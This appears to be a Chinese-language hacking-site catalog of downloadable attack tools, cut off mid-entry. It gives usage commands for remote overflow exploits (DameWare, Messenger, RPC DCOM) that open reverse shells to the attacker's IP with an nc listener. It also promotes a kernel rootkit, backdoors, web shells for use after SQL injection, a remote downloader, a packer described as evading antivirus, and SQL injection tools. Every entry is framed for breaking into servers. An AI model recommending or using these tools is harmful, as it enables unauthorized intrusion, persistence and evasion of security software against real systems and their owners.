您现在的位置: 攻击程序
1,darewere远程溢出程序。
http://www.hacker.com.cn/down/DameWare.rar
特征断口6129,darewere远程控制控制程序溢出工具,命令格式是:
DameWare.exe <host> <your_ip> <your_port>
反向连接,需要有外网ip,溢出后在本地用nc监听端口,普通防火墙能饶过。
2,Messenger远程溢出程序。
http://www.hacker.com.cn/down/MsgHack.rar
Messenger服务溢出程序,对服务器没有太大的作用,对普通客户机成功率比较高,考虑到危害的问题,此版本只能针对xp+sp1,不能攻击2000,命令格式是:
MsgHack -h 192.168.0.1 -v 3 -l 1 -s 1 -r 192.168.0.5 -p 99
同样是反向连接,成功率为60%以上。
3,Retina RPC DCOM scan +RPC 图形界面溢出程序。
http://www.hacker.com.cn/down/rpc.rar
retina的扫描加攻击程序,现在对外网几乎不能成功,对入侵服务器或者是网关后的渗透有非常好的效果!个人发现内网有90%可以成功!
后门木马
1,内核级rootkit:hxdef100
http://www.hacker.com.cn/down/hxdef100.zip
参数有点多,单纯使用并没有太大的优点,只能实现端口复用和简单的shell,但是别忽略了他的功能!如果配合功能强大的后门,那将是非常厉害的!!(注意:hxdef100.exe是主程序,千万不能自己运行,不然清除就麻烦了!请详细看说明,不建议新手使用!)
2,wineggdropshell
http://www.hacker.com.cn/down/wineggdropshell.rar
功能非常强大的后门程序!配置简单方便,可自定义端口,实现常见的安全检测,相当于一个工具箱。(强烈建议配合hxdef使用!)
3,TFTPD
http://www.hacker.com.cn/down/tftpd.rar
由lilo提供的TFTP程序,可自己修改一些配置,在入侵后shell下传输数据比较方便。
4,脚本后门
http://www.hacker.com.cn/down/脚本后门.rar
包含cmd.cgi、cmd.pl、lpmm.asp、phpshell.php,短小精干的脚本后门程序,用于SQL注入并上传程序后控制服务器和提升权限。由臭要饭的!提供。
5,iget
http://www.hacker.com.cn/down/iget.rar
小骗子的iget脚本,上传到服务器然后运行,可下载预定义网页路径的程序,然后用某种方法运行,功能单一,非常适合入侵。
6,SQL综合利用工具
http://www.hacker.com.cn/down/SQLTools.rar
由“蓝色凯博”CEO发哥编写的SQL利用程序,能实现非常强大的功能,可利用数据库的存储过程实现非常多的功能,是SQL入侵中不可多得的好东东。
7,remoxec
http://www.hacker.com.cn/down/remoxec.zip
没有3389,没有ipc$,没有连接方式,只知道对方的帐户和密码,如何连接,如何进一步入侵?使用这个工具就可以实现连接并运行的目的。(需要rpc支持!)
8,幻影
http://www.hacker.com.cn/down/幻影.rar
用于木马或者后门的加壳,对国内杀毒软件和安全程序能比较好的躲开,但是很多次实验后发现国外的服务器上的那些安全程序能杀。
脚本相关
1,access注入程序
http://www.hacker.com.cn/down/Creak.rar
用于发现SQ
